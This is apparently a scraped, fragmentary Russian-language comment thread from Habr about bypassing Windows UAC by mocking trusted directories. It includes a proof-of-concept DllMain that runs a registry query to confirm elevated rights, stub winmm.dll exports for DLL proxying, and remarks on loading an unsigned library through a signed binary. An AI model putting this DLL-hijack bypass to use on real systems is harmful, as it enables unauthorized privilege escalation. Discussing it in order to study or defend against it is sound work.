Хабр Курсы для всех
РЕКЛАМА
Практикум, Хекслет, SkyPro, авторские курсы — собрали всех и попросили скидки. Осталось выбрать!

Но я попробовал WinSAT.exe поменять (всего пару байт).
И вот что получилось:

#include <windows.h>
int DllMain(void* hInst,int dwReason,void* lpReserved)
{
WinExec("cmd.exe /c reg query HKU\\S-1-5-19 > %temp%\\test.txt", 1);
exit(0);
}
HKEY_USERS\S-1-5-19\AppEvents
HKEY_USERS\S-1-5-19\Console
HKEY_USERS\S-1-5-19\Control Panel
HKEY_USERS\S-1-5-19\Environment
HKEY_USERS\S-1-5-19\EUDC
HKEY_USERS\S-1-5-19\Keyboard Layout
HKEY_USERS\S-1-5-19\Software
HKEY_USERS\S-1-5-19\System
Может все же не "пародирования", а имитации?
dumpbin winmm.dll /exportsvoid CloseDriver(void) {}
void DefDriverProc(void) {}
void DriverCallback(void) {}
void DrvGetModuleHandle(void) {}
void GetDriverModuleHandle(void) {}
void OpenDriver(void) {}
...
DllMain в сообщении выше — это я к тому, что функционал проксирования нам неинтересен, достаточно только загрузки с нужными правамизапуск подписанного приложения, которое использует не подписанную библиотеку?
кстати с очень скудной информацией (нет путей к запускаемому приложению).
Обход контроля учетных записей (UAC) путем пародирования доверенных директорий